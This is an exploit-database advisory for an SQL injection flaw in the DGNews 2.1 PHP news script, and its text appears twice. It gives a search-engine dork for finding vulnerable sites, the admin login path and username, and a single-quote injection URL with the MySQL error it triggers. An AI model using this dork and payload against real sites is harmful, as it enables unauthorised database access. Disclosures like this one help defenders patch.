DGNews 2.1 - SQL Injection

EDB-ID:

15853

CVE:

N/A




Platform:

PHP

Date:

2010-12-29


#Remote SQL Injection Vulnerability
#name      : DGNews v 2.1
#Author    : kalashnikov
#dork      : inurl:news.php?go=fullnews&newsid
#admincp   : admin/login.php 
// the user is "admin"===========MYSQL INJ=======
http://localhost/pach/news.php?go=fullnews&newsid=1'
===========================
Warning: mysql_num_rows(): /home/user/public_html/news.php on line 227===========================
# Site      : http://vbspiders.com
# Group     : KaLa$nikoV t34m
# Date      : {26-12-2010}
# Software  : DGNews v 2.1
# Greetz    : just me :L
# team      : VoLc4n0 --=-- stone love --=-- fla$h 

#Remote SQL Injection Vulnerability
#name      : DGNews v 2.1#
Author    : kalashnikov
#dork      : inurl:news.php?go=fullnews&newsid
#admincp   : admin/login.php 
// the user is "admin"===========MYSQL INJ=======
http://localhost/pach/news.php?go=fullnews&newsid=1' 
===========================
Warning: mysql_num_rows(): /home/user/public_html/news.php on line 227
===========================
# Site      : http://vbspiders.com
# Group     : KaLa$nikoV t34m
# Date      : {26-12-2010}# Software  : DGNews v 2.1# Greetz    : just me :L
# team      : VoLc4n0 --=-- stone love --=-- fla$h